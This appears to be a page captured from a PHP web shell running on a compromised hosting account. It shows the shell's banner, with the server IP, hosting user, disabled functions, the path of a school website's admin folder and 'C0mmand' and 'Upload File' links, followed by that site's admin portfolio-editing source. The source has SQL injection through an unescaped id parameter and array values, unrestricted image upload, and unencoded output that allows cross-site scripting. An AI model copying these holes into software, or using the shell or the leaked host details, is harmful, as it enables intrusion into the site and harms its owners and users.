|
Server IP : 217.21.85.138 / Your IP : 216.73.216.103 Web Server : LiteSpeed System : Linux in-mum-web906.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u915722082 ( 915722082) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u915722082/domains/vethathirimaharishismartschool.com/public_html/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include 'header.php';
if(isset($_POST['submit'])){
$id=mysqli_real_escape_string($connect,$_POST['id']);
$mail=mysqli_real_escape_string($connect,$_POST['cmail']);
$name=mysqli_real_escape_string($connect,$_POST['name']);
$edu=mysqli_real_escape_string($connect,$_POST['edu']);
//print_r($tag);
$message=mysqli_real_escape_string($connect,$_POST['msg']);
$rs=$_POST['rs'];
$ex=$_POST['ex'];
$ed=$_POST['ed'];
$fbook=mysqli_real_escape_string($connect,$_POST['fbook']);
$link=mysqli_real_escape_string($connect,$_POST['linkedin']);
$twitter=mysqli_real_escape_string($connect,$_POST['twitter']);
$web=mysqli_real_escape_string($connect,$_POST['web']);
//$allowed=array('jpg','jpeg','png');
if(!empty($_FILES['image']['name'])){
$iname=$_FILES['image']['name'];
$ifile=$_FILES['image']['tmp_name'];
//$sql_file="INSERT INTO portafila(name,edu,message,fbook,link,twitter,image) VALUES('$name','$edu','$message','$fbook','$link','$twitter','$iname')";
//$sql_query_file=mysqli_query($connect,$sql_file);
$update_query = "UPDATE portafila SET name= '$name',edu='$edu',message='$message',image='$iname',fbook='$fbook',link='$link',twitter='$twitter',mail='$mail',web='$web' WHERE id = $id";
$sql_query=mysqli_query($connect,$update_query);
move_uploaded_file($ifile,'../assets/images/portfolia/'.$iname);
if($rs[0]!=''){
foreach($rs as $value){
$value=mysqli_real_escape_string($connect,$value);
$select="SELECT * FROM rs WHERE name='$value'";
$fresult=mysqli_query($connect,$select);
if(mysqli_num_rows($fresult)<1){
$sql_file="INSERT INTO rs(name,ref) VALUES('$value',$id)";
$result=mysqli_query($connect,$sql_file);
}
}
}
if(sizeof($ex)>=1){
foreach($ex as $row){
$row=mysqli_real_escape_string($connect,$row);
$select_1="SELECT * FROM ex WHERE name='$row'";
$result_1=mysqli_query($connect,$select_1);
if(mysqli_num_rows($result_1)<1){
$sql_file_1="INSERT INTO ex(name,ref) VALUES('$row',$id)";
$result_1=mysqli_query($connect,$sql_file_1);
}
}
}
if(sizeof($ed)>=1){
foreach($ed as $edu){
$edu=mysqli_real_escape_string($connect,$edu);
$selects="SELECT * FROM edu WHERE name='$edu'";
$results=mysqli_query($connect,$selects);
if(mysqli_num_rows($results)<1){
$sql_file="INSERT INTO edu(name,ref) VALUES('$edu',$id)";
$sql_result=mysqli_query($connect,$sql_file);
}
}
}
header('location:viewportfila.php');
/*$ref="SELECT * FROM portafila ORDER BY id DESC LIMIT 1";
$result=mysqli_query($connect,$ref);
while($row=mysqli_fetch_assoc($result)){
$id=$row['id'];
}*/
}
else {
$update_query = "UPDATE portafila SET name= '$name',edu='$edu',message='$message',fbook='$fbook',link='$link',twitter='$twitter',mail='$mail',web='$web' WHERE id = $id";
$sql_query=mysqli_query($connect,$update_query);
if(sizeof($ex)>=1){
foreach($ex as $row){
$select_1="SELECT * FROM ex WHERE name='$row'";
$result_1=mysqli_query($connect,$select_1);
if(mysqli_num_rows($result_1)<1){
$sql_file="INSERT INTO ex(name,ref) VALUES('$row',$id)";
$result=mysqli_query($connect,$sql_file);
}
}
}
if(sizeof($ed)>=1){
foreach($ed as $edu){
$edu=mysqli_real_escape_string($connect,$edu);
$selects="SELECT * FROM edu WHERE name='$edu'";
$results=mysqli_query($connect,$selects);
if(mysqli_num_rows($results)<1){
$sql_file="INSERT INTO edu(name,ref) VALUES('$edu',$id)";
$sql_result=mysqli_query($connect,$sql_file);
}
}
}
header('location:viewportfila.php');
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="description" content="Neon Admin Panel" />
<meta name="author" content="" />
<link rel="icon" href="../assets/img/favicon.ico">
<title>CCUS-Edit Portfila</title>
<link rel="stylesheet" href="assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css">
<link rel="stylesheet" href="assets/css/font-icons/entypo/css/entypo.css">
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Noto+Sans:400,700,400italic">
<link rel="stylesheet" href="assets/css/bootstrap.css">
<link rel="stylesheet" href="assets/css/neon-core.css">
<link rel="stylesheet" href="assets/css/neon-theme.css">
<link rel="stylesheet" href="assets/css/neon-forms.css">
<link rel="stylesheet" href="assets/css/custom.css">
<script src="assets/js/jquery-1.11.3.min.js"></script>
<!--[if lt IE 9]><script src="assets/js/ie8-responsive-file-warning.js"></script><![endif]-->
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body class="page-body" data-url="http://neon.dev">
<div class="page-container"><!-- add class "sidebar-collapsed" to close sidebar by default, "chat-visible" to make chat appear always -->
<div class="sidebar-menu">
<div class="sidebar-menu-inner">
<?php
include 'sidebar.php';
?>
</div>
</div>
<div class="main-content">
<div class="row">
<!-- Profile Info and Notifications -->
<div class="col-md-6 col-sm-8 clearfix">
<ul class="user-info pull-left pull-none-xsm">
<!-- Profile Info -->
<li class="profile-info dropdown"><!-- add class "pull-right" if you want to place this from right -->
<ul class="dropdown-menu">
<!-- Reverse Caret -->
<li class="caret"></li>
<!-- Profile sub-links -->
<li>
<a href="extra-timeline.html">
<i class="entypo-user"></i>
Edit Profile
</a>
</li>
<li>
<a href="mailbox.html">
<i class="entypo-mail"></i>
Inbox
</a>
</li>
<li>
<a href="extra-calendar.html">
<i class="entypo-calendar"></i>
Calendar
</a>
</li>
<li>
<a href="#">
<i class="entypo-clipboard"></i>
Tasks
</a>
</li>
</ul>
</li>
</ul>
<ul class="user-info pull-left pull-right-xs pull-none-xsm">
<!-- Raw Notifications -->
</ul>
</div>
<!-- Raw Links -->
<div class="col-md-6 col-sm-4 clearfix hidden-xs">
<ul class="list-inline links-list pull-right">
<!-- Language Selector -->
<li class="sep"></li>
<li class="sep"></li>
<li>
<a href="logout.php">
Log Out <i class="entypo-logout right"></i>
</a>
</li>
</ul>
</div>
</div>
<hr />
<h2>Portfolia</h2>
<br />
<div class="row">
<div class="col-md-12">
<div class="panel panel-primary" data-collapsed="0">
<?php
if(isset($_GET['id'])){
$id=$_GET['id'];
$view="SELECT * FROM portafila WHERE id=$id";
$view_result=mysqli_query($connect,$view);
while($row=mysqli_fetch_assoc($view_result)){
$id=$row['id'];
$name=$row['name'];
$edu=$row['edu'];
$image=$row['image'];
$description=$row['message'];
$fbook=$row['fbook'];
$link=$row['link'];
$twitter=$row['twitter'];
}
}
?>
<div class="panel-body">
<form role="form" action='editportfila.php' method='POST' class="form-horizontal form-groups-bordered" enctype="multipart/form-data">
<div class="form-group">
<label for="field-1" class="col-sm-3 control-label">Name</label>
<div class="col-sm-5">
<input name='name' type="text" class="form-control" value='<?php echo $name;?>' id="field-1" placeholder="name">
<input name='id' type="hidden" class="form-control" value='<?php echo $id;?>' id="field-1" placeholder="Post-title">
</div>
</div>
<div class="form-group">
<label for="field-1" class="col-sm-3 control-label">Education</label>
<div class="col-sm-5">
<input name='edu' type="text" class="form-control" value='<?php echo $edu;?>' id="field-1" placeholder="Post-title">
</div>
</div>
<div class="form-group">
<label for="field-1" class="col-sm-3 control-label">Banner Image</label>
<div class="col-sm-5">
<input name='image' type="file" class="form-control" id="field-file" placeholder="Placeholder" >
<?php
echo "<span><b>Image upload 2mb only</b></span>";
?>
</div>
</div>
<!--<div class="form-group">
<label class="col-sm-3 control-label">Category</label>
<div class="col-sm-5">
<select name="tag[]" class="select2" multiple>
<?php
/*$sql="SELECT * FROM tag";
$sql_query=mysqli_query($connect,$sql);
while($row=mysqli_fetch_assoc($sql_query)){
$tag=$row["tags"];
?>
<option value='<?php echo $tag;?>'><?php echo $tag;?></option>
<?php
}*/
?>
</select>
</div>
</div>-->
<div class="form-group">
<label for="field-ta" class="col-sm-3 control-label">Bio</label>
<div class="col-sm-9">
<textarea name='msg' class="form-control" id="field-ta" placeholder="Textarea"><?php echo $description;?></textarea>
</div>
</div>
<div class="form-group">
<label for="field-ta" class="col-sm-3 control-label">Area Of Expertise</label>
<?php
$s=0;
$view="SELECT * FROM ex WHERE ref=$id";
$view_result=mysqli_query($connect,$view);
if(mysqli_num_rows($view_result)<1){
?>
<div id="survey_options">
<div class="col-sm-7" >
<input name='ex[]' type='text' class="form-control" id="field-ta" placeholder="Area Of Expertise"/>
</div>
<div class="col-sm-2" >
<span class="btn btn-success" id="add_field"><i class="fa fa-plus"></i>Add More</span>
<!--<a href='#' id="remove_fields"><i class="fa fa-plus"></i>Remove Field</a>-->
</div>
</div>
<div id="newRows"></div>
<?php
}
else {
while($row=mysqli_fetch_assoc($view_result)){
//$id=$row['id'];
$name=$row['name'];
if($s==0){
?>
<div id="survey_options">
<div class="col-sm-7" >
<input name='ex[]' type='text' value='<?php echo $name;?>' class="form-control" id="field-ta" placeholder="Area Of Expertise"/>
</div>
<div class="col-sm-2" >
<span class="btn btn-success" id="add_field"><i class="fa fa-plus"></i>Add More</span>
<!--<a href='#' id="remove_fields"><i class="fa fa-plus"></i>Remove Field</a>-->
</div>
</div>
<?php
}
else {
?>
<div id="survey_options">
<div class="col-sm-3" >
</div>
<div style="margin-top:15px;" class="col-sm-7" >
<input name='ex[]' type='text' value='<?php echo $name;?>' class="form-control" id="field-ta" placeholder="Area Of Expertise"/>
</div>
<div style="margin-top:15px;" class="col-sm-2" >
<span class="btn btn-danger" id="removeRow"><i class="fa fa-plus"></i>Remove</span>
<!--<a href='#' id="remove_fields"><i class="fa fa-plus"></i>Remove Field</a>-->
</div>
</div>
<?php
}
$s=$s+1;
}
}
?>
<div id="newRows"></div>
</div>
<div class="form-group">
<label for="field-ta" class="col-sm-3 control-label">Education</label>
<?php
$m=0;
$view="SELECT * FROM edu WHERE ref=$id";
$view_result=mysqli_query($connect,$view);
if(mysqli_num_rows($view_result)<1){
?>
<div id="survey_options">
<div class="col-sm-7" >
<input name='ed[]' type='text' class="form-control" id="field-ta" placeholder="Education"/>
</div>
<div class="col-sm-2" >
<span class="btn btn-success" id="add_fields"><i class="fa fa-plus"></i>Add More</span>
<!--<a href='#' id="remove_fields"><i class="fa fa-plus"></i>Remove Field</a>-->
</div>
</div>
<div id="newRow-1"></div>
<?php
}
else {
while($row=mysqli_fetch_assoc($view_result)){
//$id=$row['id'];
$name=$row['name'];
if($m==0){
?>
<div id="survey_options">
<div class="col-sm-7" >
<input name='ed[]' type='text' value='<?php echo $name;?>' class="form-control" id="field-ta" placeholder="Education"/>
</div>
<div class="col-sm-2" >
<span class="btn btn-success" id="add_fields"><i class="fa fa-plus"></i>Add More</span>
<!--<a href='#' id="remove_fields"><i class="fa fa-plus"></i>Remove Field</a>-->
</div>
</div>
<div id="newRow-1"></div>
<?php
}
else {
?>
<div id="survey_options">
<div class="col-sm-3" >
</div>
<div style="margin-top:15px;" class="col-sm-7" >
<input name='ed[]' type='text' value='<?php echo $name;?>' class="form-control" id="field-ta" placeholder="Education"/>
</div>
<div style="margin-top:15px;" class="col-sm-2" >
<span class="btn btn-danger" id="removeRow"><i class="fa fa-plus"></i>Remove</span>
<!--<a href='#' id="remove_fields"><i class="fa fa-plus"></i>Remove Field</a>-->
</div>
</div>
<?php
}
$m=$m+1;
}
}
?>
<div id="newRow-1"></div>
</div>
<div class="form-group">
<label class="col-sm-3 control-label">FaceBook</label>
<div class="col-sm-5">
<div class="input-group">
<input type="text" name="fbook" value='<?php echo $fbook;?>' class="form-control typeahead" data-prefetch="data/countries.json" placeholder="facebbok" />
<span class="input-group-addon"><i class="entypo-facebook"></i></span>
</div>
</div>
</div>
<div class="form-group">
<label class="col-sm-3 control-label">Linkedin</label>
<div class="col-sm-5">
<div class="input-group">
<input type="text" name="linkedin" value='<?php echo $link;?>'class="form-control typeahead" data-prefetch="data/countries.json" placeholder="linkedin" />
<span class="input-group-addon"><i class="entypo-linkedin"></i></span>
</div>
</div>
</div>
<div class="form-group">
<label class="col-sm-3 control-label">Twitter</label>
<div class="col-sm-5">
<div class="input-group">
<input type="text" name="twitter" value='<?php echo $twitter;?>' class="form-control typeahead" data-prefetch="data/countries.json" placeholder="twitter" />
<span class="input-group-addon"><i class="entypo-twitter"></i></span>
</div>
</div>
</div>
<div class="form-group">
<label class="col-sm-3 control-label">Mail</label>
<div class="col-sm-5">
<div class="input-group">
<input type="text" name="cmail" class="form-control typeahead" placeholder="mail" />
<span class="input-group-addon"><i class="entypo-mail"></i></span>
</div>
</div>
</div>
<div class="form-group">
<label class="col-sm-3 control-label">Website</label>
<div class="col-sm-5">
<div class="input-group">
<input type="text" name="web" class="form-control typeahead" placeholder="website" />
<span class="input-group-addon"><i class="entypo-globe"></i></span>
</div>
</div>
</div>
<div class="form-group">
<div class="col-sm-offset-3 col-sm-5">
<button name='submit'type="submit" class="btn btn-success">Submit</button>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
<!-- Footer -->
<?php
include 'footer.php';
?>
</div>
<div id="chat" class="fixed" data-current-user="Art Ramadani" data-order-by-status="1" data-max-chat-history="25">
<div class="chat-inner">
<h2 class="chat-header">
<a href="#" class="chat-close"><i class="entypo-cancel"></i></a>
<i class="entypo-users"></i>
Chat
<span class="badge badge-success is-hidden">0</span>
</h2>
<div class="chat-group" id="group-1">
<strong>Favorites</strong>
<a href="#" id="sample-user-123" data-conversation-history="#sample_history"><span class="user-status is-online"></span> <em>Catherine J. Watkins</em></a>
<a href="#"><span class="user-status is-online"></span> <em>Nicholas R. Walker</em></a>
<a href="#"><span class="user-status is-busy"></span> <em>Susan J. Best</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Brandon S. Young</em></a>
<a href="#"><span class="user-status is-idle"></span> <em>Fernando G. Olson</em></a>
</div>
<div class="chat-group" id="group-2">
<strong>Work</strong>
<a href="#"><span class="user-status is-offline"></span> <em>Robert J. Garcia</em></a>
<a href="#" data-conversation-history="#sample_history_2"><span class="user-status is-offline"></span> <em>Daniel A. Pena</em></a>
<a href="#"><span class="user-status is-busy"></span> <em>Rodrigo E. Lozano</em></a>
</div>
<div class="chat-group" id="group-3">
<strong>Social</strong>
<a href="#"><span class="user-status is-busy"></span> <em>Velma G. Pearson</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Margaret R. Dedmon</em></a>
<a href="#"><span class="user-status is-online"></span> <em>Kathleen M. Canales</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Tracy J. Rodriguez</em></a>
</div>
</div>
<!-- conversation template -->
<div class="chat-conversation">
<div class="conversation-header">
<a href="#" class="conversation-close"><i class="entypo-cancel"></i></a>
<span class="user-status"></span>
<span class="display-name"></span>
<small></small>
</div>
<ul class="conversation-body">
</ul>
<div class="chat-textarea">
<textarea class="form-control autogrow" placeholder="Type your message"></textarea>
</div>
</div>
</div>
<!-- Chat Histories -->
<ul class="chat-history" id="sample_history">
<li>
<span class="user">Art Ramadani</span>
<p>Are you here?</p>
<span class="time">09:00</span>
</li>
<li class="opponent">
<span class="user">Catherine J. Watkins</span>
<p>This message is pre-queued.</p>
<span class="time">09:25</span>
</li>
<li class="opponent">
<span class="user">Catherine J. Watkins</span>
<p>Whohoo!</p>
<span class="time">09:26</span>
</li>
<li class="opponent unread">
<span class="user">Catherine J. Watkins</span>
<p>Do you like it?</p>
<span class="time">09:27</span>
</li>
</ul>
<!-- Chat Histories -->
<ul class="chat-history" id="sample_history_2">
<li class="opponent unread">
<span class="user">Daniel A. Pena</span>
<p>I am going out.</p>
<span class="time">08:21</span>
</li>
<li class="opponent unread">
<span class="user">Daniel A. Pena</span>
<p>Call me when you see this message.</p>
<span class="time">08:27</span>
</li>
</ul>
</div>
<script>
/*var survey_options = document.getElementById('survey_options');
var add_more_fields = document.getElementById('add_more_fields');
var fields = document.getElementById('fields');
var remove_fields = document.getElementById('remove_fields');
add_more_fields.onclick = function(){
var newField = document.createElement('input');
newField.setAttribute('type','text');
newField.setAttribute('name','rs[]');
newField.setAttribute('class','form-control');
newField.setAttribute('placeholder','Resear Area');
survey_options.appendChild(newField);
}
remove_fields.onclick = function(){
var input_tags = survey_options.getElementsByTagName('input');
if(input_tags.length > 1) {
survey_options.removeChild(input_tags[(input_tags.length) - 1]);
}
}*/
/*var btn=document.querySelector('#add_more_fields');
btn.onclick=function(){
var newField = document.createElement('div');
newField.innerHTML=generateit();
document.getElementById("survey_options").appendChild(newField);
}
function generateit(){
return '<div class="col-sm-3" ></div><div class="col-sm-7" ><input name="rs" type="text" class="form-control" id="field-ta" placeholder="Resear Area"/></div><div class="col-sm-2" > <span class="btn btn-success" id="removeRow"><i class="fa fa-plus"></i>Remove</span>';
}
$(document).on('click', '#removeRow', function () {
$(this).closest('#survey_options').remove();
});
/*function removeit(btn){
//document.getElementById("survey_options").remove();
//document.getElementById("survey_options").removeChild(btn.parentNode);
this.parentElement.remove();
}
//document.getElementById("survey_options").removeChild(btn.parentNode);
*/
// add row
$("#search").click(function () {
var html = '';
html += '<div id="publish1"><div class="form-group"><label class="col-sm-3 control-label">Title</label><div class="col-sm-5"><input name="stitle[]" type="text" id="title" class="form-control" id="field-1" placeholder="Publication-title"></div></div><div class="form-group"><label class="col-sm-3 control-label">Description</label><div class="col-sm-8">';
html+=' <textarea name="sbox[]" required class="form-control" id="field-ta" placeholder="Textarea"></textarea></div><div class="col-sm-1"><span class="btn btn-danger" id="removeRow"><i class="fa fa-plus"></i>-</span></div></div>';
$('#click').append(html);
});
// remove row
$(document).on('click', '#removeRow', function () {
$(this).closest('#publish1').remove();
});
// add row
$("#add_more_fields").click(function () {
var html = '';
html += '<div id="survey_options">';
html += '<div class="col-sm-3" >';
html += '</div>';
html += '<div style="margin-top:15px;"class="col-sm-7" >';
html += '<input name="rs[]" type="text" class="form-control" id="field-ta" placeholder="Resear Area"/>';
html += '</div>';
html += '<div style="margin-top:15px;" class="col-sm-2" >';
html += ' <span class="btn btn-danger" id="removeRow"><i class="fa fa-plus"></i>Remove Row</span>';
html += '</div>';
html +='</div>';
$('#newRow').append(html);
});
// remove row
$(document).on('click', '#removeRow', function () {
$(this).closest('#survey_options').remove();
});
// add row
$("#add_field").click(function () {
var html = '';
html += '<div id="survey_options">';
html += '<div class="col-sm-3" >';
html += '</div>';
html += '<div style="margin-top:15px;"class="col-sm-7" >';
html += '<input name="ex[]" type="text" class="form-control" id="field-ta" placeholder="Area Of Expertise"/>';
html += '</div>';
html += '<div style="margin-top:15px;" class="col-sm-2" >';
html += ' <span class="btn btn-danger" id="removeRow"><i class="fa fa-plus"></i>Remove</span>';
html += '</div>';
html +='</div>';
$('#newRows').append(html);
});
// remove row
$(document).on('click', '#removeRow', function () {
$(this).closest('#survey').remove();
});
$("#add_fields").click(function () {
var html = '';
html += '<div id="survey_options">';
html += '<div class="col-sm-3" >';
html += '</div>';
html += '<div style="margin-top:15px;"class="col-sm-7" >';
html += '<input name="ed[]" type="text" class="form-control" id="field-ta" placeholder="Eduction"/>';
html += '</div>';
html += '<div style="margin-top:15px;" class="col-sm-2" >';
html += ' <span class="btn btn-danger" id="removeRow"><i class="fa fa-plus"></i>Remove</span>';
html += '</div>';
html +='</div>';
$('#newRow-1').append(html);
});
// remove row
$(document).on('click', '#removeRow', function () {
$(this).closest('#survey').remove();
});
</script>
<!-- Imported styles on this page -->
<link rel="stylesheet" href="assets/js/select2/select2-bootstrap.css">
<link rel="stylesheet" href="assets/js/select2/select2.css">
<link rel="stylesheet" href="assets/js/selectboxit/jquery.selectBoxIt.css">
<link rel="stylesheet" href="assets/js/daterangepicker/daterangepicker-bs3.css">
<link rel="stylesheet" href="assets/js/icheck/skins/minimal/_all.css">
<link rel="stylesheet" href="assets/js/icheck/skins/square/_all.css">
<link rel="stylesheet" href="assets/js/icheck/skins/flat/_all.css">
<link rel="stylesheet" href="assets/js/icheck/skins/futurico/futurico.css">
<link rel="stylesheet" href="assets/js/icheck/skins/polaris/polaris.css">
<!-- Bottom scripts (common) -->
<script src="assets/js/gsap/TweenMax.min.js"></script>
<script src="assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js"></script>
<script src="assets/js/bootstrap.js"></script>
<script src="assets/js/joinable.js"></script>
<script src="assets/js/resizeable.js"></script>
<script src="assets/js/neon-api.js"></script>
<!-- Imported scripts on this page -->
<script src="assets/js/select2/select2.min.js"></script>
<script src="assets/js/bootstrap-tagsinput.min.js"></script>
<script src="assets/js/typeahead.min.js"></script>
<script src="assets/js/selectboxit/jquery.selectBoxIt.min.js"></script>
<script src="assets/js/bootstrap-datepicker.js"></script>
<script src="assets/js/bootstrap-timepicker.min.js"></script>
<script src="assets/js/bootstrap-colorpicker.min.js"></script>
<script src="assets/js/moment.min.js"></script>
<script src="assets/js/daterangepicker/daterangepicker.js"></script>
<script src="assets/js/jquery.multi-select.js"></script>
<script src="assets/js/icheck/icheck.min.js"></script>
<script src="assets/js/neon-chat.js"></script>
<!-- JavaScripts initializations and stuff -->
<script src="assets/js/neon-custom.js"></script>
<!-- Demo Settings -->
<script src="assets/js/neon-demo.js"></script>
</body>
</html>